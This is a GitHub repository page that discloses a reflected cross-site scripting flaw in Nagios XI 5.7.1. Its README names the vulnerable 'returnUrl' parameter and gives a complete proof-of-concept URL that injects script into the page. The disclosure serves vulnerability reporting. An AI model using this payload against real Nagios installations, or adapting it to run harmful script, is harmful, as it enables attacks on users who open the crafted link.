Skip to content
/ Nagios-XI-Reflected-XSS Public

A reflected cross-site scripting (XSS) in Nagios XI 5.7.1 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.

1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

EmreOvunc/Nagios-XI-Reflected-XSS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
nagios_xi_5_7_1_xss_poc.html
nagios_xi_5_7_1_xss_poc.html
 
 

Repository files navigation

Nagios-XI-Reflected-XSS

A reflected cross-site scripting (XSS) in Nagios XI 5.7.1 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.

PoC

To exploit vulnerability, someone could use a GET request to 'http://[server]/includes/components/ccm/' by manipulating 'returnUrl' parameter in the request body to impact users who open a maliciously crafted link or third-party web page.

http://[server]/includes/components/ccm/?cmd=modify&id=1&page=1&returnUrl=%22%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&type=host

About

A reflected cross-site scripting (XSS) in Nagios XI 5.7.1 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.

Topics

nagios nagiosxi nagios-xi nagios-xi-exploit nagios-xi-reflected-xss

Resources

Readme
Activity

Stars

1 star

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages